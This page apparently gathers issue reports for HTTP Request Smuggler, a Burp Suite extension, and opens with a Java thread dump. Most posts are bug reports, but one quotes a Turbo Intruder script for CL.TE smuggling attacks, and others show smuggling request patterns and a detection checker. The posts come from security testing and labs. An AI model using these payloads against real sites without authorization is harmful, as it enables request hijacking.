        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

process reaper
    native=true, suspended=false, block=0, wait=0
    lock=null owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.ProcessHandleImpl.waitForProcessExit0(Native Method)
        [email protected]/java.lang.ProcessHandleImpl$1.run(ProcessHandleImpl.java:147)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

Keep-Alive-Timer
    native=false, suspended=false, block=0, wait=36
    lock=null owned by null (-1), cpu=2, user=1
        [email protected]/java.lang.Thread.sleep(Native Method)
        [email protected]/sun.net.www.http.KeepAliveCache.run(KeepAliveCache.java:191)
        [email protected]/java.lang.Thread.run(Thread.java:833)
        [email protected]/jdk.internal.misc.InnocuousThread.run(InnocuousThread.java:162)

pool-project-thread-10
    native=true, suspended=false, block=0, wait=0
    lock=null owned by null (-1), cpu=3, user=2
        [email protected]/sun.nio.ch.Net.poll(Native Method)
        [email protected]/sun.nio.ch.NioSocketImpl.park(NioSocketImpl.java:181)
        [email protected]/sun.nio.ch.NioSocketImpl.park(NioSocketImpl.java:190)
        [email protected]/sun.nio.ch.NioSocketImpl.implRead(NioSocketImpl.java:314)
        [email protected]/sun.nio.ch.NioSocketImpl.read(NioSocketImpl.java:350)
        [email protected]/sun.nio.ch.NioSocketImpl$1.read(NioSocketImpl.java:803)
        [email protected]/java.net.Socket$SocketInputStream.read(Socket.java:966)
        app//burp.ba8.read(Unknown Source)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.read(SSLSocketInputRecord.java:478)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.readHeader(SSLSocketInputRecord.java:472)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.bytesInCompletePacket(SSLSocketInputRecord.java:70)
        [email protected]/sun.security.ssl.SSLSocketImpl.readApplicationRecord(SSLSocketImpl.java:1455)
        [email protected]/sun.security.ssl.SSLSocketImpl$AppInputStream.read(SSLSocketImpl.java:1059)
        app//net.portswigger.ee.e(Unknown Source)
        app//net.portswigger.ee.a(Unknown Source)
        app//net.portswigger.ey.a(Unknown Source)
        app//net.portswigger.ey.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-11
    native=true, suspended=false, block=0, wait=0
    lock=null owned by null (-1), cpu=6, user=4
        [email protected]/sun.nio.ch.Net.poll(Native Method)
        [email protected]/sun.nio.ch.NioSocketImpl.park(NioSocketImpl.java:181)
        [email protected]/sun.nio.ch.NioSocketImpl.park(NioSocketImpl.java:190)
        [email protected]/sun.nio.ch.NioSocketImpl.implRead(NioSocketImpl.java:314)
        [email protected]/sun.nio.ch.NioSocketImpl.read(NioSocketImpl.java:350)
        [email protected]/sun.nio.ch.NioSocketImpl$1.read(NioSocketImpl.java:803)
        [email protected]/java.net.Socket$SocketInputStream.read(Socket.java:966)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.read(SSLSocketInputRecord.java:478)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.readHeader(SSLSocketInputRecord.java:472)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.bytesInCompletePacket(SSLSocketInputRecord.java:70)
        [email protected]/sun.security.ssl.SSLSocketImpl.readApplicationRecord(SSLSocketImpl.java:1455)
        [email protected]/sun.security.ssl.SSLSocketImpl$AppInputStream.read(SSLSocketImpl.java:1059)
        app//net.portswigger.ee.e(Unknown Source)
        app//net.portswigger.ee.a(Unknown Source)
        app//net.portswigger.ey.a(Unknown Source)
        app//net.portswigger.ey.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

Timeout option not working

It seems like the timeout setting is not working. I set it to 10 but it does not have any effect on the waiting time.

Issue not showing in dashboard

Hi,

I'm using Burp Pro and learning through the awesome Web Academy. When I launch a smuggle probe against the first lab, as described in the project readme, I correctly find the requests causing the smuggling in the flow tab (with "Unrecognized method XPOST" in the response), but no issue appears in the dashboard or in the extender output (only 'completed 1 of 1').
I'm pretty sure this is due to an error of mine, as I'm still a newbie, but any help would be greatly appreciated!

Thanks for your awesome tools

yongicobay

flow tab not showing

Hi,
I just tried this plugin, and the flow tab is not showing, so it can't be used.
Using 2.1.03 beta.

best regards

Turbo Intruder Attacks Queue But Never Launch

Not sure if something has changed recently with the script that the plugin inserts into turbo intruder but when I click 'Launch CL.TE/TE.CL attack' I can see the engine starting and the requests queueing but no requests are actually made. Have tried this on multiple lab instances, on 2 different machines with 2 different versions of Burp and consistently get this bug. Have watched plenty of YT videos in which they follow the exact same steps and the requests launch no problem. Screenshots of script and queue attached.

Extension output says:

"The engine has already started - you no longer need to invoke engine.start() manually. If you prefer to invoke engine.start() manually, set autoStart=False in the constructor
Cancelled attack
Attack aborted with items waiting to be queued."

No requests in Logger++

Why does Smuggle attack (TE.CL) change my Content-Length automatically?

Hi, I am having trouble right now. My original request packet in my Repeater is
1
You can clearly see that the Content-Length is 4, but when I put it in Smuggle attack (TE.CL), this field is changed.
2
How can I solve this problem? First I tried to modify the Python script in Turbo Intruder, but it doesn't matter. No matter how I change it, it still changes itself automatically.

Not able to get "404" status code after smuggling the attack through (TE.CL & CE.TL)?

Burp throws one issue that "http://redacted.com" vulnerable to "HTTP Request Smuggling" but when I am trying to Smuggle the attack (TE.CL & CE.TL) no "404" status in the response.

Burp is trying to exploit this with different smuggling techniques.
{HTTP Request Smuggling: CL.TE aposed (delayed response)}
{HTTP Request Smuggling: CL.TE quoted (delayed response)}
{HTTP Request Smuggling: TE.CL 0dwrap}
{HTTP Request Smuggling: CL.TE gareth1}
{HTTP Request Smuggling: CL.TE aposed left-alive}
{HTTP Request Smuggling: CL.TE nested left-alive}
{HTTP Request Smuggling: CL.TE quoted left-alive}
{HTTP Request Smuggling: CL.TE suffix1:127 left-alive}
{HTTP Request Smuggling: CL.TE spacefix1:127 left-alive}

Is it vulnerable to this attack?

Thanks

Add option to use Engine.BURP to enable proxy support

When testing in an IP restricted setting it would be handy to be able to switch the engine to Engine.BURP to use an existing project upstream proxy with http request smuggler.

Is this something that you would consider as an option for the default extension build?

"Smuggle attack" uses "Connection: keep-alive" even when issue was detected with "Connection: close"

Hi!

I'm not quite sure if this is intended, but I've noticed that all attacks launched through the "Smuggle attack" option will issue requests with "Connection: keep-alive", even if the original detection mentions "closed" as a requirement.

Steps to reproduce:

  • Scan any target that produces a finding ending in closed
  • Right-click the issue -> Smuggle Attack -> Attack
  • Notice that the attack request contains a "Connection: keep-alive" header

Is this something that could impact findings, or is it intended/unimportant?

Thanks,
Alex

Provide option to stop hostname resolution check

I'm running into an issue where the HTTP request smuggler extension will fail to run because it cannot resolve the hostname.

The host I'm testing can only be accessed through a proxy so I'm not 100% sure how the DNS resolves requests. Every request in the burp proxy history shows "unknown host", but everything works fine. I can usually bypass this issue resolution error with extensions like turbo intruder, but this one simply fails and quits.

Providing some options to stop this check would be great! Maybe I'm missing something in the settings as well, any help is appreciated!

Scan for smuggling attacks

I am trying to use HTTP to request a smuggler to test a CL.TE experiment, but I can't scan for smuggling

Launch Smuggle Attack only loads TL-CE.py

Hey I tried looking in the docs to see if there was a way to change this, apologies if I missed it-

Working through the labs and was testing out the CE-TL and couldn't figure out why it wasn't returning a 404. Finally realized the smuggle attack option from Repeater defaults to the TL-CE.py script. To use CE-TL I had to manually copy-paste in the source from the repo.

Is that the current expected behavior? Is there a way to switch through Burp?

Attack config window too large

On some PC versions, if you right-click and launch a smuggle probe, the UI will be bigger than the computer
screen, hence unusable. If you try to right-click on the tab, there is no minimisation option.
Screenshot from 2020-05-27 23-19-09

Burp scanner vs http request smuggler plugin

Hi @albinowax,

I have managed to exploit an HTTP request smuggling issue, but I have noticed a difference between the Burp scanner (Pro version) and the HTTP Request Smuggler plugin.

Running the plugin, nothing is detected, whereas the Burp scanner detects the vulnerability well.

I have checked the difference between both using logger++.

The working request uses this pattern:

POST / HTTP/1.1
 Transfer-Encoding: chunked
Host: www.host.com
Content-Length: 5

1
Z
Q


This one works and is detected well by the Burp scanner. However, any modification of this pattern affects the result. For example, if you swap the Transfer-Encoding and Host HTTP headers, it does not work anymore.

POST / HTTP/1.1
Host: www.host.com
 Transfer-Encoding: chunked
....

When I launch HTTP request smuggling plugin, I can see in logger++ that the Transfer-Encoding header is added after the Content-Length. I can see these two requests:

...
Content-Length: 11
 Transfer-Encoding: chunked

1
Z
Q


And this one

Content-Length: 5
 Transfer-Encoding: chunked

1
Z
Q

So in my case, the server responds well and the plugin didn't find anything. So I was wondering why there is this difference and whether it's possible to force these checks using this plugin.

Thanks a lot for your work and for everything you do for the community.

Your work is impressive and awesome !

Compilation error

$ md5sum turbo-intruder-all.jar 
10d7607c5621ce021c2ed7b6de9560d5  turbo-intruder-all.jar
> Task :compileJava FAILED
/tmp/http-request-smuggler/src/burp/SuggestAttack.java:19: error: cannot find symbol
            String headers = Utils.getHeaders(request);
                                  ^
  symbol:   method getHeaders(String)
  location: class Utils
/tmp/http-request-smuggler/src/burp/SuggestAttack.java:73: error: constructor TurboIntruderFrame in class TurboIntruderFrame cannot be applied to given types;
        new TurboIntruderFrame(message, new int[]{}, script, Utilities.helpers.stringToBytes(request)).actionPerformed(e);
        ^
  required: IHttpRequestResponse,int[]
  found: IHttpRequestResponse,int[],String,byte[]
  reason: actual and formal argument lists differ in length
2 errors

I've also tried:

$ md5sum turbo-intruder-all.jar 
b051b96ebf3027c6b1c36d34da4e8c67  turbo-intruder-all.jar

If this is a version incompatibility, can you please document the version required?

Ideally this dep. would be on Maven central - or in your own Maven-compatible artifact repository - and included in the dependencies section of the build.gradle file rather than as you've currently set it up.

Menu is too big.

The "HTTP Smuggle Probe" menu is too big, I can't even select the "ok" button.

Attack menu doesn't show up for certain techniques

For some attack techniques the menu Smuggle attack CL.TE or Smuggle attack TE.CL does not show up when I right-click. For instance, I noticed that it's not working for this scenario:
TrAnSfer-EnCOding: cHuNkeD
I believe this is due to the check done in the class SuggestAttack.java on line 28

if (headers.contains("chunked") || headers.contains("Transfer-Encoding")) {
...
}

So for any test that doesn't contain at least one of those words the attack menu won't show up. Maybe add lower case before the check.
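
A defender-side check for the two header forms raised in the issues above (the space-prefixed ` Transfer-Encoding: chunked` line and the mixed-case `TrAnSfer-EnCOding: cHuNkeD`), as an added example that is not part of the extension's code or of either post. The function names and finding labels are hypothetical, and the sample requests are constructed from the fragments quoted in the issues.

```python
import re

# Header field names must be tokens (RFC 7230, section 3.2.6).
TOKEN = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")

# Constructed samples built from the request fragments quoted in the issues.
SCANNER_REQUEST = ("POST / HTTP/1.1\r\n Transfer-Encoding: chunked\r\n"
                   "Host: www.host.com\r\nContent-Length: 5\r\n\r\n1\r\nZ\r\nQ\r\n\r\n")
MIXED_CASE_REQUEST = ("POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 6\r\n"
                      "TrAnSfer-EnCOding: cHuNkeD\r\n\r\n0\r\n\r\nX")
PLAIN_REQUEST = "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"


def naive_check(headers):
    """The case-sensitive substring test quoted in the issue, for comparison."""
    return "chunked" in headers or "Transfer-Encoding" in headers


def parse_headers(raw):
    """Split a raw request into (name, value, folded) tuples.

    folded is True when the line began with a space or tab, which a strict
    parser reads as a continuation of the previous line, not a new header.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    parsed = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        folded = line[:1] in (" ", "\t")
        name, sep, value = line.strip().partition(":")
        if sep:
            parsed.append((name, value.strip(), folded))
    return parsed


def framing_findings(raw):
    """Return the set of framing ambiguities found in one raw request."""
    findings = set()
    has_cl = has_te = False
    for name, value, folded in parse_headers(raw):
        if not TOKEN.match(name):
            findings.add("invalid-header-name")
        lname = name.strip().lower()  # header names are case-insensitive
        if lname == "content-length":
            has_cl = True
        elif lname == "transfer-encoding":
            has_te = True
            if folded:
                findings.add("te-after-leading-whitespace")
            if name != "Transfer-Encoding" or value != "chunked":
                findings.add("te-unusual-spelling")
    if has_cl and has_te:
        # Two length indicators: front end and back end may pick different ones.
        findings.add("content-length-with-transfer-encoding")
    return findings


if __name__ == "__main__":
    for sample in (SCANNER_REQUEST, MIXED_CASE_REQUEST, PLAIN_REQUEST):
        print(naive_check(sample), sorted(framing_findings(sample)))
```

Matching on the lower-cased header name is what lets the mixed-case form be recognised where the substring test returns false.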

After Launched Smuggle Probe....nothing happens

Output

This might be a big newbie question...but:
System: OSX Catalina and Burp Suite Community.
-I click on the Target tab and right-click on a www.*****.com-address which was spidered Passive.
-Right-click on the GET-request and "Launch Smuggle Probe"

  • Go to Extender-->Extensions-->Output tab--> UI:
  • Nothing shows up. It just says (sometimes) 1 attack in queue. Where can I see the results?

I know how the HTTP Smuggling works in practice. I have been doing it manually, but when I saw this add-on I would like to try it.

Couldn't find http-request-smuggler-all.jar

I'm trying to install http-request-smuggler manually, but I can't find any jar file other than the turbo-intruder jar file in the folder. I believe I need the http-request-smuggler jar file to complete the installation. Help.

Forbidden newlines in headers are not allowed

Due to the default Fooz:bar header issued when probing with HTTP Request Smuggler in Burp Suite, the server returns a 403 error saying "Forbidden: Newlines in headers are not allowed". But when I manually remove the Fooz:bar header line in Repeater, I get the response correctly. Is there a workaround so that this works directly in the tool?

Error running Smuggle Probe on Web-Security-Academy

Updated Burp to 2021.8 today on MacOS and installed HTTP Request Smuggler from the BApp store.
Logged in to the Academy and started the CL.TE lab.
Located request in Proxy History, right-clicked, selected Extensions|HTTP Request Smuggler|Smuggle probe.
On the Output pane for the extension, I am getting the following:

Using albinowaxUtils v0.4
Loaded HTTP Request Smuggler v2.0
Updating active thread pool size to 8
Loop 0
Queued 1 attacks from 1 requests in 0 seconds
TImeout with response. Start time: 1628558700578 Current time: 1628558711713 Difference: 11135 Tolerance: 10000
Unexpected report with response
Error in thread: Cannot invoke "String.length()" because "decoded" is null. See error pane for stack trace.

And in the error pane, I get

java.lang.NullPointerException: Cannot invoke "String.length()" because "decoded" is null
	at burp.ConfigurableSettings.getString(ConfigurableSettings.java:177)
	at burp.ChunkContentScan.sendPoc(ChunkContentScan.java:132)
	at burp.ChunkContentScan.doConfiguredScan(ChunkContentScan.java:76)
	at burp.SmuggleScanBox.doScan(SmuggleScanBox.java:111)
	at burp.Scan.doScan(BulkScan.java:552)
	at burp.BulkScanItem.run(BulkScan.java:472)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
	at java.base/java.lang.Thread.run(Thread.java:832)

FWIW, I originally was attempting on the lab description page, not the lab itself, and I was not getting any errors (maybe because it isn't vulnerable, but ¯\_(ツ)_/¯).

Edit: I hadn't checked earlier; it did show the vulnerability in the Dashboard, but I was waiting for the extension output to show completed and I never got that message.

Burp not logging packets while performing HTTP request smuggle probe.

I’ve been trying to exploit and track down an apparent HTTP smuggling issue in a site I’m testing which is causing me lots of grief.

I start by spinning up a collaborator client and copying a payload.

I then go to the target tab, select my target domain and enter the collaborator domain in the poc-collab domain field and select all ‘poc’ options.

I then click ok which launches the scan.
Using the Logger++ extension I can watch the requests and responses being sent.
I also launch Wireshark and capture my Ethernet interface at the same time.
The traffic generated by Burp and displayed in both logger++ (and project options -> misc -> logging output) looks something like this:
image

All requests are only slight differences between the Content Length and Transfer Encoding headers. No actual payload information (for example, containing collaborator payloads or the 'smuggled' requests) is presented. Only a handful of characters.

This is in stark contrast to what Wireshark sees as a raw packet on the wire:
image
(fun fact, Wireshark also struggles to handle malformed CL/TE information)

But once the output is cleaned up from Wireshark, the REAL request is shown as below:
image

This packet isn’t logged anywhere that I can find. And, more concerning is that the finding isn’t noted anywhere, even though collaborator pingbacks are regularly occurring.
image

Currently there is no way for me to easily reproduce the results generating the collaborator payloads as I can’t identify the original requests that generated them without manually digging through all the Wireshark packets and testing different smuggler payloads.

I’m not sure why this appears to be an issue as I have issues raised in the target tab for other hosts with similar requests as shown here:
image

But none raised for the specific host I’m testing currently.

Any help you could provide would be greatly appreciated.
Thanks!

Strange issue when trying to run the plugin

Burp Community Edition, v2.1.04
Installed the extension and see no errors in the extensions panel. The option to launch
a smuggle probe is shown in the menu when selecting a host in the proxy menu,
the attack config is shown, and when I click OK, there is no error and no output pane is shown.

Looking at output in the extension menu for this plugin I see:
thread pool size: 8
timeout: 10
use key: true
key method: true
key status: true
key content-type: true
key server: true
key header names: false
skip vulnerable hosts: false
skip obsolete permutations: false
only report exploitable: false
risky mode: false
Loaded HTTP Request Smuggler v1.03
Queued 1 attacks
Queued 1 attacks
Completed 1 of 1
Completed 2 of 2

and for turbo Intruder:
Loaded Turbo Intruder v1.0.14

I cannot figure out if I missed something in the setup or if there is an issue; it looks like the attack is performed but the result is not showing.

Smuggle probe running even though task execution paused

Hi,

I’ve ‘globally’ paused task extensions as well as all the below audits/crawls as shown below. However, using the extension Logger++, the smuggle probe extension is clearly generating new traffic regardless, at the same rate as before.

Logger++ reports the source of the traffic as ‘extender’.

All tasks paused
image

Pause happened at request 26. Note that it continues (and will persist)
image

Unloading the extension stops the smuggle probe task, but it can not be resumed and instead must start again.

The config I used was as shown below, however, it does not appear to matter which options are used:
image

If there is some way to pause the execution of the smuggle probe that would be possible to resume, that would be most welcome.

In a similar vein, being able to see that the smuggle probe is running, and specifically, what host it is running against would be a most welcome additional feature.

Thanks,

Prefix not showing in Turbo Intruder

If Burp Pro detects an HTTP Smuggle Vulnerability, you can launch a Smuggle Attack (CL.TE) or (TE.CL). Launching a Smuggle attack from Turbo Intruder should lead you to this configuration:

# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
import re

def queueRequests(target, wordlists):

    # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )
    engine.start()

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''POST /hopefully404 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1'''

    chunk_size = hex(len(prefix)).lstrip("0x")
    attack = target.req.replace('0\r\n\r\nX', chunk_size+'\r\n'+prefix+'\r\n0\r\n\r\n')
    content_length = re.search('Content-Length: ([\d]+)', attack).group(1)
    attack = attack.replace('Content-Length: '+content_length, 'Content-length: '+str(int(content_length)+len(chunk_size)-3))
    engine.queue(attack)

    for i in range(14):
        engine.queue(target.req)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)

Vulnerable Request:

POST / HTTP/1.1
Host: example.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

X

In the result, I cannot see the payload or the prefix in my request in the Turbo Intruder requests. It is just like repeating the request without the payloads. I don't know if there is something wrong on my end or in my configuration. Let me hear it from @albinowax

Failure to detect and report issue

Tested on multiple targets:
The following response is received after about 50 seconds, the extension failed to report the issues
The targets were tested manually and confirmed vulnerable

HTTP/1.1 504 GATEWAY_TIMEOUT
Content-Length: 0
Connection: Close

Receiving Null Response Smuggler

Hi,

The Burp extension and the smuggler tool both indicated the HTTP request smuggling (CL.TE) vulnerability, but when I test the vulnerability through Turbo Intruder I get a null response.

Is there any mistake in the payload? I have not even received a 404 or a redirection, just a null.

null

Not detecting H2.CL

Hey guys, I used the req. smuggler probes to solve all the new labs, including the tunnel probes. It was very helpful, but it looks like it's not working w/ HTTP/2 CL.

  • The main HTTP/2 probe always issues as HTTP/2 TE, also in the "LAB: H2.CL request smuggling".
  • The Tunnel probe CL only does 4 requests and stops; I've tried to use it in many cases and it didn't work.
  • The Tunnel probe TE works perfectly.

So I ended up solving the CL lab as TE as well; it confused me. I also noticed that almost all of them have multiple solutions (CL and TE). I will not go into detail here because it would give spoilers to some ppl.

This is not a problem for this case, because it's solvable as TE, but apparently it is really not detecting H2.CL in any way.

..btw, thank you for this amazing extension.
